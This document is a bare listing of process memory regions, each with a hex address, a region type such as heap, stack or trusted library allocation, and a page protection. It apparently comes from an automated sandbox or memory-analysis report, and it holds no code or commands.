||
DF4A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
DDBE000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
328D000
|
heap
|
page read and write
|
||
90B7000
|
unkown
|
page write copy
|
||
2F3E000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
||
6169000
|
unkown
|
page execute read
|
||
2845000
|
heap
|
page read and write
|
||
2D4F000
|
unkown
|
page read and write
|
||
62FB000
|
trusted library allocation
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
624A000
|
trusted library allocation
|
page read and write
|
||
DE42000
|
heap
|
page read and write
|
||
C252000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
61CE000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page write copy
|
||
6179000
|
heap
|
page read and write
|
||
5E7F000
|
stack
|
page read and write
|
||
E36A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2EFD000
|
stack
|
page read and write
|
||
326F000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
C9A0000
|
direct allocation
|
page read and write
|
||
9057000
|
unkown
|
page execute read
|
||
C528000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2A84000
|
heap
|
page read and write
|
||
6154000
|
heap
|
page read and write
|
||
D568000
|
heap
|
page read and write
|
||
3364000
|
heap
|
page read and write
|
||
94AF000
|
unkown
|
page readonly
|
||
A2F5000
|
direct allocation
|
page read and write
|
||
3274000
|
heap
|
page read and write
|
||
E010000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
CCB6000
|
heap
|
page read and write
|
||
6307000
|
trusted library allocation
|
page read and write
|
||
2FD8000
|
heap
|
page read and write
|
||
D8D8000
|
heap
|
page read and write
|
||
5EC5000
|
heap
|
page read and write
|
||
6258000
|
trusted library allocation
|
page read and write
|
||
9502000
|
unkown
|
page readonly
|
||
904B000
|
unkown
|
page execute read
|
||
9526000
|
unkown
|
page readonly
|
||
E64000
|
heap
|
page read and write
|
||
C2D6000
|
heap
|
page read and write
|
||
9544000
|
unkown
|
page readonly
|
||
B0A000
|
unkown
|
page read and write
|
||
5D7E000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
FE7000
|
heap
|
page read and write
|
||
BA42000
|
heap
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
AD07000
|
stack
|
page read and write
|
||
C210000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CAFB000
|
trusted library allocation
|
page read and write
|
||
93F4000
|
unkown
|
page readonly
|
||
C14A000
|
heap
|
page read and write
|
||
2B84000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CAD6000
|
heap
|
page read and write
|
||
2FDD000
|
stack
|
page read and write
|
||
CA3E000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
D2D4000
|
heap
|
page read and write
|
||
296E000
|
unkown
|
page read and write
|
||
91A8000
|
unkown
|
page readonly
|
||
32D3000
|
heap
|
page read and write
|
||
305B000
|
heap
|
page read and write
|
||
914E000
|
unkown
|
page read and write
|
||
30FC000
|
stack
|
page read and write
|
||
D09C000
|
stack
|
page read and write
|
||
103E000
|
heap
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
907C000
|
unkown
|
page write copy
|
||
28E0000
|
heap
|
page read and write
|
||
2FDE000
|
unkown
|
page read and write
|
||
CB18000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6255000
|
trusted library allocation
|
page read and write
|
||
BE10000
|
heap
|
page read and write
|
||
B29000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D812000
|
heap
|
page read and write
|
||
B31000
|
unkown
|
page readonly
|
||
61B6000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
E3EF000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
BB08000
|
heap
|
page read and write
|
||
A24D000
|
direct allocation
|
page read and write
|
||
5F0B000
|
heap
|
page read and write
|
||
2936000
|
direct allocation
|
page read and write
|
||
CCCF000
|
heap
|
page read and write
|
||
3266000
|
heap
|
page read and write
|
||
2ABC000
|
heap
|
page read and write
|
||
32F8000
|
heap
|
page read and write
|
||
331F000
|
unkown
|
page read and write
|
||
CE00000
|
remote allocation
|
page read and write
|
||
2FD3000
|
heap
|
page read and write
|
||
CF9F000
|
stack
|
page read and write
|
||
DA65000
|
heap
|
page read and write
|
||
104A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A2EE000
|
direct allocation
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
10AC000
|
heap
|
page read and write
|
||
BE52000
|
heap
|
page read and write
|
||
6179000
|
heap
|
page read and write
|
||
FDE000
|
heap
|
page read and write
|
||
29AD000
|
stack
|
page read and write
|
||
D670000
|
heap
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
2982000
|
direct allocation
|
page read and write
|
||
E15A000
|
heap
|
page read and write
|
||
2B50000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
D896000
|
heap
|
page read and write
|
||
9401000
|
unkown
|
page readonly
|
||
FED000
|
heap
|
page read and write
|
||
2733000
|
heap
|
page read and write
|
||
BC42000
|
heap
|
page read and write
|
||
BA80000
|
heap
|
page read and write
|
||
61F5000
|
heap
|
page read and write
|
||
6308000
|
trusted library allocation
|
page read and write
|
||
950F000
|
unkown
|
page readonly
|
||
DDBE000
|
heap
|
page read and write
|
||
2B1B000
|
heap
|
page read and write
|
||
D4A2000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
DEC6000
|
heap
|
page read and write
|
||
DCF8000
|
heap
|
page read and write
|
||
304D000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
5EA1000
|
heap
|
page read and write
|
||
60E000
|
stack
|
page read and write
|
||
970A000
|
trusted library allocation
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
DB2A000
|
heap
|
page read and write
|
||
DAA6000
|
heap
|
page read and write
|
||
2B84000
|
heap
|
page read and write
|
||
D854000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
918E000
|
unkown
|
page read and write
|
||
4B9E000
|
stack
|
page read and write
|
||
2B44000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
D736000
|
heap
|
page read and write
|
||
2733000
|
heap
|
page read and write
|
||
DE84000
|
heap
|
page read and write
|
||
CC36000
|
heap
|
page read and write
|
||
C4A4000
|
heap
|
page read and write
|
||
C94A000
|
heap
|
page read and write
|
||
2A15000
|
direct allocation
|
page read and write
|
||
CC45000
|
heap
|
page read and write
|
||
3003000
|
heap
|
page read and write
|
||
5D3C000
|
stack
|
page read and write
|
||
90BD000
|
unkown
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
18D000
|
stack
|
page read and write
|
||
333C000
|
heap
|
page read and write
|
||
E1DE000
|
heap
|
page read and write
|
||
2FD8000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
2B30000
|
heap
|
page read and write
|
||
36D0000
|
heap
|
page read and write
|
||
6258000
|
trusted library allocation
|
page read and write
|
||
4F9000
|
stack
|
page read and write
|
||
43B0000
|
heap
|
page read and write
|
||
E052000
|
heap
|
page read and write
|
||
9548000
|
unkown
|
page readonly
|
||
D62E000
|
heap
|
page read and write
|
||
32D9000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
62FE000
|
trusted library allocation
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CF38000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
61A7000
|
heap
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
630C000
|
trusted library allocation
|
page read and write
|
||
DE42000
|
heap
|
page read and write
|
||
9458000
|
unkown
|
page readonly
|
||
3273000
|
heap
|
page read and write
|
||
DC32000
|
heap
|
page read and write
|
||
A6B0000
|
heap
|
page read and write
|
||
9078000
|
unkown
|
page write copy
|
||
C14A000
|
heap
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
5EDB000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page execute read
|
||
CDAC000
|
heap
|
page read and write
|
||
A4F5000
|
direct allocation
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
265B000
|
stack
|
page read and write
|
||
CB06000
|
trusted library allocation
|
page read and write
|
||
33EC000
|
heap
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
C738000
|
heap
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
C1CE000
|
heap
|
page read and write
|
||
A16B000
|
direct allocation
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
3276000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
68AB000
|
unkown
|
page execute read
|
||
2726000
|
heap
|
page read and write
|
||
2A89000
|
heap
|
page read and write
|
||
D736000
|
heap
|
page read and write
|
||
D62E000
|
heap
|
page read and write
|
||
D39A000
|
heap
|
page read and write
|
||
CAF9000
|
trusted library allocation
|
page read and write
|
||
DBAE000
|
heap
|
page read and write
|
||
282C000
|
heap
|
page read and write
|
||
A162000
|
direct allocation
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
80DC000
|
unkown
|
page execute read
|
||
3278000
|
heap
|
page read and write
|
||
301F000
|
unkown
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
9412000
|
unkown
|
page readonly
|
||
2700000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A0D9000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
71F000
|
stack
|
page read and write
|
||
326E000
|
stack
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
2F50000
|
remote allocation
|
page read and write
|
||
2580000
|
heap
|
page read and write
|
||
CD6A000
|
heap
|
page read and write
|
||
956F000
|
unkown
|
page readonly
|
||
CCBE000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
2940000
|
heap
|
page read and write
|
||
5EDB000
|
heap
|
page read and write
|
||
2905000
|
heap
|
page read and write
|
||
2AAE000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
624E000
|
trusted library allocation
|
page read and write
|
||
55C3000
|
unkown
|
page execute read
|
||
61CE000
|
heap
|
page read and write
|
||
3364000
|
heap
|
page read and write
|
||
ACF000
|
unkown
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
C001000
|
heap
|
page read and write
|
||
3364000
|
heap
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
2B43000
|
heap
|
page read and write
|
||
CCF5000
|
heap
|
page read and write
|
||
E1DE000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
6F8D0000
|
unkown
|
page readonly
|
||
615000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
FE6000
|
heap
|
page read and write
|
||
D99E000
|
heap
|
page read and write
|
||
B16000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2E7C000
|
stack
|
page read and write
|
||
3168000
|
heap
|
page read and write
|
||
2910000
|
direct allocation
|
page read and write
|
||
97E2000
|
trusted library allocation
|
page read and write
|
||
94BB000
|
unkown
|
page readonly
|
||
31E4000
|
heap
|
page read and write
|
||
CC64000
|
heap
|
page read and write
|
||
CD28000
|
heap
|
page read and write
|
||
3640000
|
heap
|
page read and write
|
||
94E1000
|
unkown
|
page readonly
|
||
DF09000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
2A73000
|
heap
|
page read and write
|
||
90B0000
|
unkown
|
page read and write
|
||
D0C4000
|
heap
|
page read and write
|
||
2B4E000
|
stack
|
page read and write
|
||
32C3000
|
heap
|
page read and write
|
||
615C000
|
heap
|
page read and write
|
||
3362000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9535000
|
unkown
|
page readonly
|
||
1058000
|
heap
|
page read and write
|
||
5EDB000
|
heap
|
page read and write
|
||
E119000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5EE3000
|
heap
|
page read and write
|
||
2B36000
|
heap
|
page read and write
|
||
BD4B000
|
heap
|
page read and write
|
||
FFDD0000
|
direct allocation
|
page read and write
|
||
9CEF000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
942A000
|
unkown
|
page readonly
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
6300000
|
trusted library allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
943C000
|
unkown
|
page readonly
|
||
301A000
|
heap
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
12A000
|
stack
|
page read and write
|
||
301A000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
1002000
|
heap
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
2A06000
|
direct allocation
|
page read and write
|
||
D1CC000
|
heap
|
page read and write
|
||
9159000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9FD4000
|
unkown
|
page readonly
|
||
31CF000
|
heap
|
page read and write
|
||
5E90000
|
heap
|
page read and write
|
||
A3B6000
|
direct allocation
|
page read and write
|
||
CDAC000
|
heap
|
page read and write
|
||
BD8C000
|
heap
|
page read and write
|
||
1046000
|
heap
|
page read and write
|
||
2AAA000
|
heap
|
page read and write
|
||
9496000
|
unkown
|
page readonly
|
||
C318000
|
heap
|
page read and write
|
||
CBDE000
|
heap
|
page read and write
|
||
CF38000
|
heap
|
page read and write
|
||
C8C6000
|
heap
|
page read and write
|
||
6C05000
|
unkown
|
page execute read
|
||
CB06000
|
trusted library allocation
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
62F9000
|
trusted library allocation
|
page read and write
|
||
D083000
|
heap
|
page read and write
|
||
90C1000
|
unkown
|
page write copy
|
||
E220000
|
heap
|
page read and write
|
||
61FC000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
61E9000
|
heap
|
page read and write
|
||
2A0E000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A7BE000
|
stack
|
page read and write
|
||
B972000
|
heap
|
page read and write
|
||
DAA6000
|
heap
|
page read and write
|
||
12551000
|
heap
|
page read and write
|
||
27BD000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
834000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6C60000
|
unkown
|
page execute read
|
||
2B50000
|
heap
|
page read and write
|
||
2A88000
|
heap
|
page read and write
|
||
5F0E000
|
heap
|
page read and write
|
||
D148000
|
heap
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
CAFB000
|
trusted library allocation
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
A14D000
|
direct allocation
|
page read and write
|
||
C0C6000
|
heap
|
page read and write
|
||
334F000
|
heap
|
page read and write
|
||
4D0C000
|
stack
|
page read and write
|
||
90D3000
|
unkown
|
page read and write
|
||
2820000
|
heap
|
page read and write
|
||
A299000
|
direct allocation
|
page read and write
|
||
CDAC000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
CC57000
|
heap
|
page read and write
|
||
A404000
|
direct allocation
|
page read and write
|
||
30A0000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
A2A8000
|
direct allocation
|
page read and write
|
||
304E000
|
unkown
|
page read and write
|
||
E0D6000
|
heap
|
page read and write
|
||
30CC000
|
heap
|
page read and write
|
||
C630000
|
heap
|
page read and write
|
||
B27E000
|
stack
|
page read and write
|
||
61C8000
|
heap
|
page read and write
|
||
919E000
|
unkown
|
page write copy
|
||
AEDC000
|
direct allocation
|
page read and write
|
||
2B84000
|
heap
|
page read and write
|
||
32F1000
|
heap
|
page read and write
|
||
669A000
|
unkown
|
page execute read
|
||
C35A000
|
heap
|
page read and write
|
||
C94B000
|
heap
|
page read and write
|
||
D7D1000
|
heap
|
page read and write
|
||
31BF000
|
stack
|
page read and write
|
||
B96000
|
heap
|
page read and write
|
||
24AD000
|
stack
|
page read and write
|
||
AE32000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
C2D6000
|
heap
|
page read and write
|
||
BCFE000
|
heap
|
page read and write
|
||
5EFC000
|
heap
|
page read and write
|
||
C9CE000
|
heap
|
page read and write
|
||
E64000
|
heap
|
page read and write
|
||
CB08000
|
trusted library allocation
|
page read and write
|
||
BE10000
|
heap
|
page read and write
|
||
328D000
|
heap
|
page read and write
|
||
5FF0000
|
remote allocation
|
page read and write
|
||
2A97000
|
heap
|
page read and write
|
||
2AA1000
|
heap
|
page read and write
|
||
9713000
|
trusted library allocation
|
page read and write
|
||
953B000
|
unkown
|
page readonly
|
||
61B1000
|
heap
|
page read and write
|
||
6A60000
|
unkown
|
page execute read
|
||
275B000
|
stack
|
page read and write
|
||
915D000
|
unkown
|
page read and write
|
||
9404000
|
unkown
|
page readonly
|
||
2900000
|
heap
|
page read and write
|
||
327C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
2BBE000
|
stack
|
page read and write
|
||
32C3000
|
heap
|
page read and write
|
||
94FE000
|
unkown
|
page readonly
|
||
62FB000
|
trusted library allocation
|
page read and write
|
||
32D3000
|
heap
|
page read and write
|
||
7937000
|
unkown
|
page execute read
|
||
C9A0000
|
trusted library allocation
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
25BD000
|
stack
|
page read and write
|
||
C738000
|
heap
|
page read and write
|
||
617B000
|
heap
|
page read and write
|
||
296D000
|
direct allocation
|
page read and write
|
||
1252E000
|
heap
|
page read and write
|
||
101E000
|
heap
|
page read and write
|
||
DD7C000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
E118000
|
heap
|
page read and write
|
||
29B6000
|
direct allocation
|
page read and write
|
||
9090000
|
unkown
|
page write copy
|
||
100D000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6315000
|
unkown
|
page execute read
|
||
E408000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
3281000
|
heap
|
page read and write
|
||
313C000
|
heap
|
page read and write
|
||
335E000
|
stack
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
A3BE000
|
direct allocation
|
page read and write
|
||
3353000
|
heap
|
page read and write
|
||
CAE4000
|
trusted library allocation
|
page read and write
|
||
23E0000
|
heap
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
615E000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
C4A4000
|
heap
|
page read and write
|
||
D2D4000
|
heap
|
page read and write
|
||
DEC6000
|
heap
|
page read and write
|
||
290B000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
30E0000
|
heap
|
page read and write
|
||
5EE5000
|
heap
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
BF5A000
|
heap
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
AAED000
|
stack
|
page read and write
|
||
9179000
|
unkown
|
page read and write
|
||
D148000
|
heap
|
page read and write
|
||
6DB6000
|
unkown
|
page execute read
|
||
D6B2000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
CE3000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
2840000
|
heap
|
page read and write
|
||
6F8FF000
|
unkown
|
page read and write
|
||
3168000
|
heap
|
page read and write
|
||
CCD3000
|
heap
|
page read and write
|
||
61AA000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
31D3000
|
heap
|
page read and write
|
||
90A3000
|
unkown
|
page read and write
|
||
C672000
|
heap
|
page read and write
|
||
2B76000
|
heap
|
page read and write
|
||
94BE000
|
unkown
|
page readonly
|
||
3330000
|
heap
|
page read and write
|
||
1055000
|
heap
|
page read and write
|
||
305D000
|
stack
|
page read and write
|
||
2734000
|
heap
|
page read and write
|
||
309F000
|
stack
|
page read and write
|
||
2927000
|
direct allocation
|
page read and write
|
||
3284000
|
heap
|
page read and write
|
||
A0D2000
|
direct allocation
|
page read and write
|
||
B972000
|
heap
|
page read and write
|
||
E15A000
|
heap
|
page read and write
|
||
A9EB000
|
stack
|
page read and write
|
||
CB06000
|
trusted library allocation
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
5EC5000
|
heap
|
page read and write
|
||
A54B000
|
direct allocation
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
954F000
|
unkown
|
page readonly
|
||
624A000
|
trusted library allocation
|
page read and write
|
||
5F09000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
ACB000
|
unkown
|
page read and write
|
||
2723000
|
heap
|
page read and write
|
||
D358000
|
heap
|
page read and write
|
||
CCA4000
|
heap
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
100C000
|
heap
|
page read and write
|
||
CA3E000
|
direct allocation
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
91A6000
|
unkown
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
D6F4000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CCC8000
|
heap
|
page read and write
|
||
DD3A000
|
heap
|
page read and write
|
||
CC79000
|
heap
|
page read and write
|
||
81F000
|
heap
|
page read and write
|
||
6255000
|
trusted library allocation
|
page read and write
|
||
61A3000
|
heap
|
page read and write
|
||
6198000
|
heap
|
page read and write
|
||
29A8000
|
direct allocation
|
page read and write
|
||
29D4000
|
direct allocation
|
page read and write
|
||
5F07000
|
heap
|
page read and write
|
||
A5DC000
|
stack
|
page read and write
|
||
2B73000
|
heap
|
page read and write
|
||
90C6000
|
unkown
|
page read and write
|
||
B935000
|
heap
|
page read and write
|
||
E262000
|
heap
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
5EDD000
|
heap
|
page read and write
|
||
5E96000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9432000
|
unkown
|
page readonly
|
||
81F000
|
heap
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
313D000
|
stack
|
page read and write
|
||
2B89000
|
heap
|
page read and write
|
||
617C000
|
heap
|
page read and write
|
||
2733000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
2E3D000
|
stack
|
page read and write
|
||
B9A000
|
heap
|
page read and write
|
||
93C6000
|
unkown
|
page readonly
|
||
6307000
|
trusted library allocation
|
page read and write
|
||
630F000
|
trusted library allocation
|
page read and write
|
||
94EB000
|
unkown
|
page readonly
|
||
DCB6000
|
heap
|
page read and write
|
||
D4A2000
|
heap
|
page read and write
|
||
E2A5000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
C6B4000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
5EF0000
|
heap
|
page read and write
|
||
A3B4000
|
direct allocation
|
page read and write
|
||
24BD000
|
stack
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
DC75000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
AE59000
|
direct allocation
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
BC84000
|
heap
|
page read and write
|
||
D526000
|
heap
|
page read and write
|
||
CFFE000
|
heap
|
page read and write
|
||
CAE2000
|
trusted library allocation
|
page read and write
|
||
CCE6000
|
heap
|
page read and write
|
||
6243000
|
trusted library allocation
|
page read and write
|
||
2AAF000
|
heap
|
page read and write
|
||
951D000
|
unkown
|
page readonly
|
||
93E1000
|
unkown
|
page readonly
|
||
617B000
|
heap
|
page read and write
|
||
87D000
|
heap
|
page read and write
|
||
A2D0000
|
direct allocation
|
page read and write
|
||
1003000
|
heap
|
page read and write
|
||
E64000
|
heap
|
page read and write
|
||
6258000
|
trusted library allocation
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
683E000
|
heap
|
page read and write
|
||
6165000
|
heap
|
page read and write
|
||
B65E000
|
stack
|
page read and write
|
||
90AA000
|
unkown
|
page write copy
|
||
2B51000
|
heap
|
page read and write
|
||
9086000
|
unkown
|
page write copy
|
||
3750000
|
heap
|
page read and write
|
||
2B6F000
|
heap
|
page read and write
|
||
DB2A000
|
heap
|
page read and write
|
||
624A000
|
trusted library allocation
|
page read and write
|
||
61CE000
|
heap
|
page read and write
|
||
9563000
|
unkown
|
page readonly
|
||
BD4A000
|
heap
|
page read and write
|
||
AE18000
|
direct allocation
|
page read and write
|
||
B4BD000
|
stack
|
page read and write
|
||
5EDD000
|
heap
|
page read and write
|
||
DAA0000
|
heap
|
page read and write
|
||
1006000
|
heap
|
page read and write
|
||
61B4000
|
heap
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
D316000
|
heap
|
page read and write
|
||
6180000
|
heap
|
page read and write
|
||
CC94000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
630A000
|
trusted library allocation
|
page read and write
|
||
3413000
|
heap
|
page read and write
|
||
29F1000
|
direct allocation
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
E19C000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page execute read
|
||
E2A4000
|
heap
|
page read and write
|
||
A0A3000
|
direct allocation
|
page read and write
|
||
D526000
|
heap
|
page read and write
|
||
BF9C000
|
heap
|
page read and write
|
||
E094000
|
heap
|
page read and write
|
||
E262000
|
heap
|
page read and write
|
||
543E000
|
stack
|
page read and write
|
||
DE85000
|
heap
|
page read and write
|
||
5F11000
|
heap
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
9701000
|
trusted library allocation
|
page read and write
|
||
A408000
|
direct allocation
|
page read and write
|
||
334E000
|
stack
|
page read and write
|
||
E2E6000
|
heap
|
page read and write
|
||
A2C0000
|
direct allocation
|
page read and write
|
||
2B51000
|
heap
|
page read and write
|
||
CAE0000
|
trusted library allocation
|
page read and write
|
||
BDCE000
|
heap
|
page read and write
|
||
1046000
|
heap
|
page read and write
|
||
CD1E000
|
heap
|
page read and write
|
||
2B82000
|
heap
|
page read and write
|
||
109B000
|
heap
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
A0F1000
|
direct allocation
|
page read and write
|
||
A6EF000
|
heap
|
page read and write
|
||
5F0E000
|
heap
|
page read and write
|
||
3273000
|
heap
|
page read and write
|
||
3153000
|
heap
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
2930000
|
heap
|
page read and write
|
||
62F4000
|
trusted library allocation
|
page read and write
|
||
44A0000
|
heap
|
page read and write
|
||
2905000
|
heap
|
page read and write
|
||
834000
|
heap
|
page read and write
|
||
2989000
|
direct allocation
|
page read and write
|
||
93CA000
|
unkown
|
page readonly
|
||
A292000
|
direct allocation
|
page read and write
|
||
6251000
|
trusted library allocation
|
page read and write
|
||
2B88000
|
heap
|
page read and write
|
||
3166000
|
heap
|
page read and write
|
||
BCFF000
|
heap
|
page read and write
|
||
616B000
|
heap
|
page read and write
|
||
AE93000
|
direct allocation
|
page read and write
|
||
D358000
|
heap
|
page read and write
|
||
61C8000
|
heap
|
page read and write
|
||
9079000
|
unkown
|
page read and write
|
||
D41E000
|
heap
|
page read and write
|
||
6150000
|
heap
|
page read and write
|
||
94F0000
|
unkown
|
page readonly
|
||
FE6000
|
heap
|
page read and write
|
||
A154000
|
direct allocation
|
page read and write
|
||
617B000
|
heap
|
page read and write
|
||
3156000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
405000
|
unkown
